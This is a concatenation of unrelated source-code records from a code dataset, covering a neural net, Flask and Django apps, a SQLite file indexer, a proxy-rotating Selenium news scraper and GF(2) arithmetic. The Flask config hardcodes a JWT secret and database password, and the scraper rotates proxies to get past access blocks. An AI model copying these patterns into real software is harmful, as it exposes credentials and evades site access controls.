1\n\n\tdef display_weights(self):\n\t\tfor layer in self.layers:\n\t\t\tprint('\\t'.join([str(neuron) for neuron in layer]))\n\n\tdef display_architecture(self):\n\t\tfor layer in self.layers:\n\t\t\tprint(layer.shape)\n\n\tdef display_outputs(self):\n\t\tfor output in self.outputs:\n\t\t\tprint('\\t'.join(str(o) for o in output))\n\n\ndef import_data(fn):\n\n\twith open(fn, 'r') as f:\n\t\td = [[int(e) for e in l.split(',')] for l in f.readlines()]\n\n\treturn d\n\ndef main():\n\n\tnn = NeuralNet([NUM_INPUTS] + HIDDEN_LAYERS + [NUM_OUTPUTS], \n\t\talpha = ALPHA, \n\t\tactivation_function = activation_function,\n\t\t)\n\n\t#-------------TRAINING------------------\n\ttraining_data = import_data(TRAINING_FILE)\n\tfor m in range(EPOCHS):\n\t\tprint('EPOCH', m)\n\t\tnn.train([[np.matrix([i == line[0] for i in range(NUM_OUTPUTS)]),np.matrix(line[1:]) ] for line in training_data])\n\n\t#-------------TESTING-------------------\n\ttesting_data = import_data(TESTING_FILE)\n\thit = 0\n\tfor i in range(len(testing_data)):\n\t\tp = np.matrix.tolist(nn.predict(np.matrix(testing_data[i][1:])))[0]\n\t\tp = p.index(max(p))\n\t\tprint(testing_data[i][0], p)\n\t\thit += p == int(testing_data[i][0])\n\n\tprint('ACCURACY: ', hit/len(testing_data)*100, '%', sep ='')\n\nif __name__ == '__main__':\n\t\tmain()\t\n\n\n\n","sub_path":"neural_nets/neural_nets.py","file_name":"neural_nets.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148581653","text":"# -*- coding:utf-8 -*-\n\nfrom odoo import models, fields, api\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass AccountPayment(models.Model):\n _inherit = 'account.payment'\n\n bsd_employee_payroll_id = fields.Many2one('bsd.employee.payroll', string='Bảng lương')\n\n @api.model\n def create(self,vals):\n _logger.debug(\"thanh toán lương\")\n _logger.debug(vals)\n pay = super(AccountPayment, self).create(vals)\n self.env['bsd.employee.payroll'].search([('id', '=', pay.bsd_employee_payroll_id.id)]).write({\n 'bsd_payment_id': pay.id,\n 'bsd_payment_date': pay.payment_date,\n 'state': 'payment'\n })\n _logger.debug(pay)\n return pay\n\n @api.model\n def default_get(self, default_fields):\n rec = super(AccountPayment, self).default_get(default_fields)\n _logger.debug(default_fields)\n return rec\n","sub_path":"bsd_employee_extend/models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"275197","text":"import json, os\nfrom flask import Flask, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nfrom flask_restful import Resource, Api\nimport json, logging\nfrom logging.handlers import RotatingFileHandler\nimport datetime\nfrom functools import wraps\nfrom flask_jwt_extended import JWTManager, verify_jwt_in_request, get_jwt_claims\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n# u_name = os.environ[\"THIS_U_NAME\"]\n# password = os.environ[\"THIS_PASSWORD\"]\n# endpoint = os.environ[\"THIS_ENDPOINT\"]\n# db_test = os.environ[\"THIS_DB_TEST\"]\n# db_dev = os.environ[\"THIS_DB_DEV\"]\n\napp.config['APP_DEBUG'] = True\n\n############################\n# JWT #\n############################\n\napp.config['JWT_SECRET_KEY'] = 'SFsieaaabjsdalkjdi32jdijd32657j'\napp.config['JWT_ACCES_TOKEN_EXPIRES'] = datetime.timedelta(days = 1)\n\njwt = JWTManager(app)\n\n###########################\n# Database #\n###########################\n\ntry:\n env = os.environ.get('FLASK_ENV', 'development')\n if env == 'testing':\n app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://hamdiranu:8hamdiranu9@0.0.0.0:3306/db_test_kiostiktest'\n else:\n app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://hamdiranu:8hamdiranu9@0.0.0.0:3306/db_kiostiktest'\n\nexcept Exception as e:\n raise e \n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndef admin_required(fn):\n @wraps(fn)\n def wrapper(*args,**kwargs):\n verify_jwt_in_request()\n claims = get_jwt_claims()\n if not claims['isadmin']:\n return {'status': 'FORBIDDEN', 'message': 'admin Only!'}, 403\n else:\n return fn(*args, **kwargs)\n return wrapper\n\ndb = SQLAlchemy(app)\nmirate = Migrate(app,db)\nmanager = Manager(app)\nmanager.add_command('db',MigrateCommand)\n\n\n######################\n# Import Blueprint #\n######################\n\n@app.after_request\ndef after_request(response):\n try :\n requestData = request.get_json()\n except Exception as e :\n requestData = request.args.to_dict()\n if response.status_code == 200 :\n app.logger.info(\"REQUEST_LOG\\t%s\",json.dumps({\n 'status_code':response.status_code,\n 'method':request.method,\n 'code':response.status,\n 'uri':request.full_path,\n 'request': request.args.to_dict(),\n 'response': json.loads(response.data.decode('utf-8'))\n })\n )\n\n elif response.status_code == 501 :\n app.logger.error(\"REQUEST_LOG\\t%s\",json.dumps({\n 'status_code':response.status_code,\n 'method':request.method,\n 'code':response.status,\n 'uri':request.full_path,\n 'request': request.args.to_dict(),\n 'response': json.loads(response.data.decode('utf-8'))\n })\n )\n\n else:\n app.logger.warning(\"REQUEST_LOG\\t%s\",json.dumps({\n 'status_code':response.status_code,\n 'method':request.method,\n 'code':response.status,\n 'uri':request.full_path,\n 'request': request.args.to_dict(),\n 'response': json.loads(response.data.decode('utf-8'))\n })\n )\n return response\n\nfrom blueprints.Book.resource import bp_book\n\napp.register_blueprint(bp_user, url_prefix = '/book')\n\ndb.create_all()\n","sub_path":"blueprints/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497422832","text":"\"\"\"\nLauncher for service-websockets.\n\nCopyright (c) 2017, Cassiny.io OÜ\nAll rights reserved.\n\"\"\"\n\nimport logging\nimport logging.config\nimport sys\n\nfrom aiohttp import web\n\nfrom config import Config as C\nfrom webhooks.routes import routes as webhooks_routes\n\nlogging.config.dictConfig(C.DEFAULT_LOGGING)\nlog = logging.getLogger(__name__)\n\n\ndef add_route(app, *args):\n \"\"\"Add routes to app instance.\"\"\"\n for route in args:\n app.router.add_route(route[0], route[1], route[2])\n\n\nif __name__ == '__main__':\n host = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'\n port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080\n app = web.Application()\n add_route(\n app,\n *webhooks_routes\n )\n\n web.run_app(app, host=host, port=port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"170824039","text":"from django.db import models\nfrom dateutil.parser import parse\nimport json\nclass Stock(models.Model):\n Date = models.DateField()\n Open = models.FloatField()\n High = models.FloatField()\n Low = models.FloatField()\n Close = models.FloatField()\n Shares_Traded = models.IntegerField()\n Turnover_Rs_Cr = models.FloatField()\n\nf = open(\"W:\\Dataworkz\\Dataworkztest\\Datafilter\\data.json\",\"r\")\njson_string = f.read()\nf.close()\n\ndata = json.loads(json_string)\n\nitems = []\nmonth={'Jan':'01',\"Feb\":'02',\"Mar\":'03',\"Apr\":'04',\"May\":'05',\"Jun\":'06',\"Jul\":'07',\"Aug\":'08',\"Sep\":'09',\"Oct\":'10',\"Nov\":'11',\"Dec\":'12'}\nfor stock in data:\n d = stock[\"Date\"][:2]\n m = stock[\"Date\"][3:6]\n y = stock[\"Date\"][7:]\n dt=y+\"-\"+month[m]+\"-\"+d\n s = Stock(Date = dt,\n Open = stock[\"Open\"],\n High = stock[\"High\"],\n Low = stock[\"Low\"],\n Close = stock[\"Close\"],\n Shares_Traded = stock[\"Shares Traded\"],\n Turnover_Rs_Cr = stock[\"Turnover (Rs. Cr)\"])\n s.save()","sub_path":"Dataworkztest/Datafilter/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"595396787","text":"import sys\nimport os\n\ntotal = 0\nacc = 0\nfor line in sys.stdin:\n line = line.strip()\n group = line.split()\n if (float(group[0]) - 0.5) * (float(group[1]) - 0.5) > 0:\n acc += 1\n total += 1\n\nprint(float(acc) / float(total))\n","sub_path":"python/examples/util/get_acc.py","file_name":"get_acc.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477017499","text":"#************************************************************************************************************************\n#Script Name :PS_Functions_IDS\n#Description :Extention on PS_Functions specific to IDS\n#Developer :Momberg Heinrich\n#CR Number(s) :ABITFA-605(IDS)\n#************************************************************************************************************************\nimport ael, acm\n\n#***********************************************************************************************\n# Public variables\n#***********************************************************************************************\ncalendar = acm.FCalendar['ZAR Johannesburg']\nINCEPTION = acm.Time().DateFromYMD(1970, 1, 1)\nTODAY = acm.Time().DateToday()\nFIRSTOFYEAR = acm.Time().FirstDayOfYear(TODAY)\nFIRSTOFMONTH = acm.Time().FirstDayOfMonth(TODAY)\nYESTERDAY = acm.Time().DateAddDelta(TODAY, 0, 0, -1)\nTWODAYSAGO = acm.Time().DateAddDelta(TODAY, 0, 0, -2)\nPREVBUSDAY = calendar.AdjustBankingDays(TODAY, -1)\nTWOBUSDAYSAGO = calendar.AdjustBankingDays(TODAY, -2)\n\nstartDateList = {'Inception':INCEPTION,\n 'First Of Year':FIRSTOFYEAR,\n 'First Of Month':FIRSTOFMONTH,\n 'PrevBusDay':PREVBUSDAY,\n 'TwoBusinessDaysAgo':TWOBUSDAYSAGO,\n 'TwoDaysAgo':TWODAYSAGO,\n 'Yesterday':YESTERDAY,\n 'Custom Date':TODAY,\n 'Now':TODAY} \nstartDateKeys = startDateList.keys()\nstartDateKeys.sort()\n\nendDateList = {'Now':TODAY,\n 'TwoDaysAgo':TWODAYSAGO,\n 'PrevBusDay':PREVBUSDAY,\n 'Yesterday':YESTERDAY,\n 'Custom Date':TODAY}\nendDateKeys = endDateList.keys()\nendDateKeys.sort()\n\n\n\n#***********************************************************************************************\n# Method name: _getCallAccounts\n# Description: Finds all the call accounts for the passed party\n# Parameters: party - The name of a counter party\n# Return Type: array\n#***********************************************************************************************\ndef getCallAccounts(portfolio, party):\n \n query = acm.CreateFASQLQuery('FTrade', 'AND')\n op = query.AddOpNode('AND')\n op.AddAttrNode('Counterparty.Oid', 'EQUAL', party.Oid())\n \n if(portfolio):\n op = query.AddOpNode('AND')\n op.AddAttrNode('Portfolio.Name', 'EQUAL', portfolio.Name())\n \n op = query.AddOpNode('AND')\n op.AddAttrNode('Instrument.InsType', 'EQUAL', acm.EnumFromString('InsType', 'Deposit'))\n \n op = query.AddOpNode('AND')\n op.AddAttrNode('Instrument.OpenEnd', 'EQUAL', acm.EnumFromString('OpenEndStatus', 'Open End') )\n \n for status in ['Void', 'Confirmed Void', 'Simulated', 'Terminated']:\n op.AddAttrNode('Status', 'NOT_EQUAL', acm.EnumFromString('TradeStatus', status))\n \n callAccounts = []\n for trade in query.Select():\n callAccounts.append(trade.Instrument())\n\n return callAccounts\n\n\n# Method name: _getReportTypes\n# Description: Finds all the call accounts for the passed party\n# Parameters: party - The name of a counter party\n# Return Type: array\n#***********************************************************************************************\ndef getReportTypes():\n types = ['.pdf', '.csv']\n return types\n\n\n\n#***********************************************************************************************\n# Method name: _getXSLTemplates\n# Description: Finds all prime services extension modules of type xsl template \n# Return Type: array\n#***********************************************************************************************\ndef getXSLTemplates():\n xmlTemplates = []\n context = acm.GetDefaultContext()\n primeModule = context.GetModule('Prime Services')\n if not primeModule:\n raise Exception('Prime Service extension module not found')\n \n for d in primeModule.Definitions():\n if str(d.TypeClass()) == 'FXSLTemplate':\n xmlTemplates.append(d.Name())\n \n return xmlTemplates\n","sub_path":"Python modules/PS_Functions_IDS.py","file_name":"PS_Functions_IDS.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407942967","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sqlite3\n\ndb = './everything_sqlite3.db'\n\nconn = sqlite3.connect(db)\ncursor = conn.cursor()\n\ndef init_db():\n global conn\n global cursor\n with open('schema.sql') as f:\n cursor.executescript(f.read())\n conn.commit()\n\n# 下一个主键(主键自己维护)\ndef next_pk():\n cursor.execute('update pks set id = id + 1')\n conn.commit()\n cursor.execute('SELECT id FROM pks')\n return cursor.fetchall()[0][0]\n\n# 新增一个文件记录\ndef db_insert(id, name, isDir, createTime, lastChangeTime, parent, checkDate):\n isDir = isDir and 1 or 0\n cursor.execute('insert into files (id, name, isDir, createTime, lastChangeTime, parent, checkDate) \\\n values (?, ?, ?, ?, ?, ?, ?)', list(map(str, (id, name, isDir, createTime, lastChangeTime, parent, checkDate))))\n conn.commit()\n\n# 传入一个id,返回全路径文件名\ndef fullFilePath(id):\n result = ''\n curid = id\n while True:\n cursor.execute('SELECT id, name, parent FROM files where id = ?', (str(curid),))\n value = cursor.fetchall()[0]\n result = value[1] + '/' + result\n if value[2] == 0:\n break\n curid = value[2]\n return result.rstrip('/')\n\n# 获取文件,返回符合条件的全路径文件名列表\ndef db_getfile(fileName):\n l = []\n cursor.execute('SELECT id, name, parent FROM files where name like ?', ('%' + fileName + '%',))\n values = cursor.fetchall()\n for v in values:\n l.append(fullFilePath(v[0]))\n return l\n\ndef db_close():\n cursor.close()\n conn.close()\n","sub_path":"Python/toys/d01_everything/src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"198331015","text":"#!/usr/bin/env python\n# coding=utf-8\n\n# 微博csv数据的问题:\n# 理论上标签应该在第二栏,实际上数据里的标签和文本都在第一栏= =\n# 我不知道标签和文本之间为什么要用'\\t',csv文件的话应该用','\n# 因此,只能采用倒读第一栏倒数第二个文本的方式判断标签\n# @Silewhi\n\nfilename = './initial_data/1_weibo_rumor.csv'\nf_true = './processed_data/true/1_weibo_true.txt'\nf_false = './processed_data/false/1_weibo_false.txt'\n\nf1 = open(f_true,'w')\nf2 = open(f_false,'w')\n\nimport csv\n\nwith open(filename,'r',encoding = 'utf-8') as f:\n reader = csv.reader(f)\n for row in reader:\n flag = row[0][-1]\n print('flag =',flag,'\\n')\n row[0] = row[0][:-2]\n print(row)\n if flag == '0':\n f1.write(row[0])\n else:\n f2.write(row[0])\n\n\nf.close()\nf1.close()\nf2.close()\n","sub_path":"后端/frequent_words/1_weibo_earlier_deal.py","file_name":"1_weibo_earlier_deal.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343384223","text":"#!/usr/bin/env python3\n\nimport argparse\n\nfrom sqlite3.dbapi2 import Connection\n\nfrom data_access.sql_ops import AutoClosingConn\nfrom model.constants import sql as sql_queries\nfrom model.db_data import Entity, Classification\n\n\ndef parse_args():\n argparser = argparse.ArgumentParser(description='A tool for inserting taxonomy information on an entity to a db')\n argparser.add_argument(\n 'name', type=str, metavar='NAME', help='The entity\\'s common name (if any, otherwise its genus-species name)'\n )\n argparser.add_argument(\n '-p', '--pop', type=int, dest='pop_est', metavar='POPEST', help='The estimated population of this entity'\n )\n argparser.add_argument(\n '-c', '-conservation', type=str, dest='cons_cd', metavar='CONS_CD',\n help='This entity\\'s conservation status, as a 2-character code'\n )\n argparser.add_argument(\n '-t', '--taxonomy', type=str.upper, nargs='+', dest='taxonomy', metavar='TAXONOMY',\n help='The entity\\'s taxonomy, with each rank and that rank\\'s value joined by an equals (=) sign'\n )\n return argparser.parse_args()\n\n\ndef get_cons_status_codes(conn: Connection) -> dict:\n status_codes = {}\n cur = conn.cursor()\n for row in cur.execute(sql_queries['select']['all_cons_codes']):\n status_codes[row[1]] = row[0]\n return status_codes\n\n\ndef get_entity_id(conn: Connection, name: str) -> int:\n cur = conn.cursor()\n cur.execute(sql_queries['select']['entity_id_by_name'], (name,))\n return cur.fetchone()\n\n\ndef get_rank_id(conn: Connection, rank: str):\n cur = conn.cursor()\n cur.execute(sql_queries['select']['rank_id_by_label'], (rank.lower(),))\n return cur.fetchone()\n\n\ndef main(args):\n with AutoClosingConn() as conn:\n cons_codes = get_cons_status_codes(conn)\n entity_cur = conn.cursor()\n if args.pop_est is not None:\n pop_est = args.pop_est\n entity_type = 'entity'\n else:\n pop_est = None\n entity_type = 'weak_entity'\n entity_to_insert = Entity.build_namedtuple(name=args.name,\n cons_status_id=cons_codes[args.cons_cd],\n pop_est=pop_est)\n entity_cur.execute(sql_queries['insert'][entity_type], entity_to_insert)\n\n entity_id = entity_cur.lastrowid\n\n pairs_list = []\n for _p in args.taxonomy:\n label, classification = _p.split('=')\n rank_id = get_rank_id(conn, label.lower())\n pairs_list.append(Classification.build_namedtuple(entity_id=entity_id, rank_id=rank_id[0], name=label))\n entity_cur.executemany(sql_queries['insert']['classification'], pairs_list)\n\n\nif __name__ == '__main__':\n argv = parse_args()\n main(argv)\n","sub_path":"insert_entity.py","file_name":"insert_entity.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116157284","text":"import torch\nimport torch.nn as nn\n\nfrom .. import util\n\n\nclass EmbeddingFeedForward(nn.Module):\n def __init__(self, input_shape, output_shape, num_layers=3, hidden_dim=None,\n activation=nn.ReLU(),\n activation_last=nn.ReLU(),\n input_is_one_hot_index=False, input_one_hot_dim=None, scale=None, offset=None):\n super().__init__()\n self._input_shape = util.to_size(input_shape)\n self._output_shape = util.to_size(output_shape)\n self._input_dim = util.prod(self._input_shape)\n self._output_dim = util.prod(self._output_shape)\n self._scale = scale\n self._offset = offset\n self._input_is_one_hot_index = input_is_one_hot_index\n self._input_one_hot_dim = input_one_hot_dim\n if input_is_one_hot_index:\n if self._input_dim != 1:\n raise ValueError('If input_is_one_hot_index==True, input_dim should be 1 (the index of one-hot value in a vector of length input_one_hot_dim.)')\n self._input_dim = input_one_hot_dim\n if num_layers < 1:\n raise ValueError('Expecting num_layers >= 1')\n layers = []\n if num_layers == 1:\n layers.append(nn.Linear(self._input_dim, self._output_dim))\n else:\n if hidden_dim is None:\n hidden_dim = int((self._input_dim + self._output_dim)/2)\n layers.append(nn.Linear(self._input_dim, hidden_dim))\n for i in range(num_layers - 2):\n layers.append(nn.Linear(hidden_dim, hidden_dim))\n layers.append(nn.Linear(hidden_dim, self._output_dim))\n self._activation = activation\n self._activation_last = activation_last\n self._layers = nn.ModuleList(layers)\n\n def forward(self, x):\n # if self._offset is not None:\n # x -= self._offset\n # if self._scale is not None:\n # x /= self._scale\n\n # ensure batched\n if len(x.shape) == 0:\n x = x.view(1)\n if self._input_is_one_hot_index:\n x = torch.zeros(x.size(0), self._input_one_hot_dim).scatter_(1, torch.tensor([[int(i)] for i in x]), 1).to(device=x.device)\n else:\n x = x.view(-1, self._input_dim).float()\n for i in range(len(self._layers)):\n layer = self._layers[i]\n x = layer(x)\n if i == len(self._layers) - 1:\n if self._activation_last is not None:\n x = self._activation_last(x)\n else:\n x = self._activation(x)\n\n return x.view(torch.Size([-1]) + self._output_shape)\n","sub_path":"pyprob/nn/embedding_feedforward.py","file_name":"embedding_feedforward.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"472133238","text":"import DataPreProcessing\n\n#Creating the instance\nforward = DataPreProcessing.DatasetProcessing(-4, 3000,\n \"/Volumes/TRANSCEND/RPi-Self-Driving-Car/cardataset/Training/Right/\")\n\n#Calling the starter method\nforward.generateDataset()\n\n#Retreiving the image and labels array\ni_array = forward.getImgArray()\nl_array = forward.getLblArray\n\nprint(i_array[1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#Greyscale Conversion\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import misc\nfrom skimage.transform import resize\n\nimage = misc.imread(\"/Volumes/TRANSCEND/RPi-Self-Driving-Car/cardataset/Training/Forward/forward (1).png\")\nimage_resized = resize(image, (18,22), mode='reflect')\nimage_list = []\nimage_list.append(image_resized)\ngrey = np.zeros((1, 18, 22))\n\n#Weighted Average Conversion\ndef weightedAverage(pixel):\n return 0.299*pixel[0] + 0.587*pixel[1] + 0.114*pixel[2]\n\n#Converting each image from color to greyscale\nfor image_num in range(len(image_list)):\n for rownum in range(len(image_list[image_num])):\n for colnum in range(len(image_list[image_num][rownum])):\n grey[image_num][rownum][colnum] = weightedAverage(image_list[image_num][rownum][colnum])\nprint(\"Completed Greyscale Conversion\")\n\nplt.imshow(image_resized)\nplt.show()\nplt.imshow(grey[0], cmap='Greys')\nplt.show()\n'''\n### IMPORT AND RESIZE TESTING\n'''\nimport glob\nfrom scipy import misc\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\n\npath = \"/Volumes/TRANSCEND/RPi-Self-Driving-Car/cardataset/Training/Forward/\"\nimage_list = []\n\n#Import and Resize the images\nfor filename in glob.glob(path+'*.png'):\n image = misc.imread(filename)\n image_resized = resize(image, (18,22), mode='reflect')\n image_list.append(image_resized)\nprint(\"Done\")\n\nplt.imshow(image)\nplt.show()\nplt.imshow(image_list[0])\nplt.show()\n'''\n","sub_path":"Testing/DataPreProcessing/DataPreProcessing_Training.py","file_name":"DataPreProcessing_Training.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161202874","text":"import numpy as np \nimport cmath\nimport matplotlib.pyplot as plt\nclass Mandelbrot(object):\n def __init__(self,width,height,xlow,xhigh,ylow,yhigh):\n \"\"\"\n Constructor\n \"\"\"\n self.width = width # width of the grid\n self.height = height # height of the grid\n self.grid = np.zeros(shape = (width,height)) # initializing a grid of zeros\n self.xs = np.linspace(xlow,xhigh,width) # numpy array with high and low values initialized for a width for x axis. This forms the real axis\n self.ys = np.linspace(ylow,yhigh,height) # numpy array with high and low values initialized for a width for y axis. This forms the imaginary axis\n def check_mandel(self,c):\n \"\"\"\n Checking the mandelbrot algorithm\n \"\"\"\n z = 0 # inital value of z\n N = 0 # value of N to be plotted\n while (N < 255): \n z = z**2 + c # iterative algorithm for the mandelbrot set\n if (abs(z) > 2):\n return N # returning the value if it isnt a mandelbrot\n N += 1 \n return 0 #returning zero after threshold is crossed\n def plot_mandel(self):\n \"\"\"\n Plotting the values based on the iterative algorithm\n \"\"\"\n for i in range(self.height):\n for j in range(self.width):\n c = complex(self.xs[j],self.ys[i]) # creating a complex number\n N = self.check_mandel(c) # the value after which the threshold for mandelbrot is crossed\n self.grid[i,j] = N # grid coordinates\n plt.imshow(self.grid, extent=(self.xs[0],self.xs[len(self.xs) - 1],self.ys[0],self.ys[len(self.ys) - 1])) # imshow to plot the points\n plt.show() # displaying\n \n \n\n\n","sub_path":"Checkpoint_3/mandelbrot.py","file_name":"mandelbrot.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383564946","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\ndef browse(url, proxy = None):\n # url = 'https://httpbin.org/ip'\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n if proxy is not None:\n chrome_options.add_argument('--proxy-server=%s' % proxy)\n chrome_options.add_argument('--no-sandbox')\n driver = webdriver.Chrome('/home/ubuntu/chromedriver',chrome_options=chrome_options)\n driver.get(url)\n driver.implicitly_wait(3) # seconds\n page_source = driver.page_source\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.close()\n return page_source, soup\n \nclass CrawlMKListing():\n MONGO_URI = \"localhost:27017\"\n MONGO_DB = \"news\"\n MONGO_COLLECTION = \"malaysiakini_v1_test1\"\n DOMAIN = \"https://www.malaysiakini.com\"\n NEWS_LISTING_DOMAIN = \"https://www.malaysiakini.com/stories/covid19\"\n PROXY_LIST = [\"socks4://120.50.56.137:40553\",\"socks4://121.122.50.157:4145\", \n \"socks4://1.9.167.36:60489\",\"socks4://1.9.111.145:4145\",\n \"socks4://45.117.228.153:4145\",\"socks4://45.117.228.97:4145\",\n \"socks4://103.220.6.254:4145\"\n ]\n START_URL = NEWS_LISTING_DOMAIN\n \n def __init__(self):\n pass\n \n def crawl(self):\n CURRENT_PAGE_URL = self.START_URL\n self.init_mongo()\n proxy = random.sample(self.PROXY_LIST,1)[0]\n print(\"Using proxy:\", proxy)\n page_source, soup = browse(url = CURRENT_PAGE_URL, proxy = proxy)\n _check = self.check(soup)\n # if _check is not True, retry the whole crawl for this page\n if _check: \n to_insert, next_page = self.parse(soup)\n to_insert_2 = self.prevent_duplicate(to_insert)\n if len(to_insert_2) > 0:\n self.coll.insert_many(to_insert_2)\n else:\n print(\"False check.\")\n \n def init_mongo(self):\n client = pymongo.MongoClient(self.MONGO_URI)\n self.coll = client[self.MONGO_DB][self.MONGO_COLLECTION]\n\n def check(self, soup):\n try:\n x = soup.find(\"title\").get_text()\n except:\n return False\n if x is None:\n return False\n if x.find(\"Access denied\") >= 0:\n return False\n return True\n\n def parse(self, soup):\n DOMAIN = self.DOMAIN\n NEWS_LISTING_DOMAIN = self.NEWS_LISTING_DOMAIN\n \n x = soup.find(\"div\", \"news\").find_all(\"a\")[:-1]\n titles = [j.find(\"h3\").getText() for j in x]\n urls = [j.get(\"href\") for j in x]\n urls = [DOMAIN + url.replace(DOMAIN, \"\") for url in urls]\n df = pd.DataFrame(dict(title = titles, url = urls)) #.sample(30)\n if df.shape[0] == 0:\n raise Exception(\"shape 0\")\n to_insert = df.to_dict(orient=\"records\")\n next_page = NEWS_LISTING_DOMAIN + soup.find(\"div\", \"news\").find_all(\"a\")[-1].get(\"href\")\n return to_insert, next_page\n \n def prevent_duplicate(self, to_insert):\n url_list = [j.get(\"url\") for j in to_insert]\n exist_url_list = [j.get(\"url\") for j in list(self.coll.find({\"url\": {\"$in\": url_list}}, {\"url\":1}))]\n to_insert_2 = [j for j in to_insert if j.get(\"url\") not in exist_url_list]\n return to_insert_2\n \n\nC = CrawlMKListing()\nC.crawl()","sub_path":"Spider/archive/dep_selenium_mkini_scraper.py","file_name":"dep_selenium_mkini_scraper.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121642265","text":"import numpy as np\nfrom Galois_Field_mod_2.functions import strip_zeros\nimport Galois_Field_mod_2\n\ndef gf2_div(dividend, divisor,p):\n\n\n N = len(dividend) - 1\n D = len(divisor) - 1\n\n if dividend[N] == 0 or divisor[D] == 0:\n dividend, divisor = strip_zeros(dividend), strip_zeros(divisor)\n\n if not divisor.any(): # if every element is zero\n raise ZeroDivisionError(\"polynomial division\")\n elif D > N:\n f_temp = dividend\n num_temp = Galois_Field_mod_2.gf2_mul_normal(f_temp,p)\n result, rem = gf2_div(num_temp,divisor,p)\n return rem,result\n\n else:\n u = dividend.astype(\"uint8\")\n v = divisor.astype(\"uint8\")\n\n m = len(u) - 1\n n = len(v) - 1\n scale = v[n].astype(\"uint8\")\n q = np.zeros((max(m - n + 1, 1),), u.dtype)\n r = u.astype(u.dtype)\n\n for k in range(0, m - n + 1):\n d = scale and r[m - k].astype(\"uint8\")\n q[-1 - k] = d\n r[m - k - n:m - k + 1] = np.logical_xor(r[m - k - n:m - k + 1], np.logical_and(d, v))\n\n r = strip_zeros(r)\n \n return q, r\n","sub_path":"Galois_Field_mod_2/gf2_div.py","file_name":"gf2_div.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513855429","text":"import sys\n\nlines = []\nfor line in sys.stdin:\n\tlines.append(line.rstrip('\\n'))\n\ndic = {}\nfor i in lines[1:]:\n if (dic.get(i.split(\" \")[1], False)):\n dic[i.split(\" \")[1]] += 1\n else:\n dic[i.split(\" \")[1]] = 1\n\nfor key, value in dic.items():\n if (value == 1):\n for i in lines[1:]:\n if (i.split(\" \")[1] == key):\n res = i.split(\" \")[0]\nprint (res)\n","sub_path":"CodingBattle-GroupeBPCE/1-IntrusionAtFactory/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"482345716","text":"import re\nfrom pprint import pprint\n\n\nregex = (\n r\"^Device ID: (?P\\S+)\"\n r\".*?\"\n r\"^ +IP address: (?P\\S+)\\n\"\n r\"^Platform: (?P.+?),\"\n r\".*?\"\n r\", Version (?P\\S+),\"\n)\n\nresult = {}\nwith open(\"sh_cdp_neighbors_sw1.txt\") as f:\n match = re.findall(regex, f.read(), re.DOTALL | re.MULTILINE)\n for m in match:\n device, ip, platform, ios = m\n result[device] = {\"ip\": ip, \"platform\": platform, \"ios\": ios}\n\npprint(result, width=60)\n","sub_path":"examples/15_module_re/parse_cdp_data_findall.py","file_name":"parse_cdp_data_findall.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383162849","text":"'''\nModule containing the Corpus class, which provides methods for loading an entire corpus of Pieces.\n'''\n\nfrom __future__ import 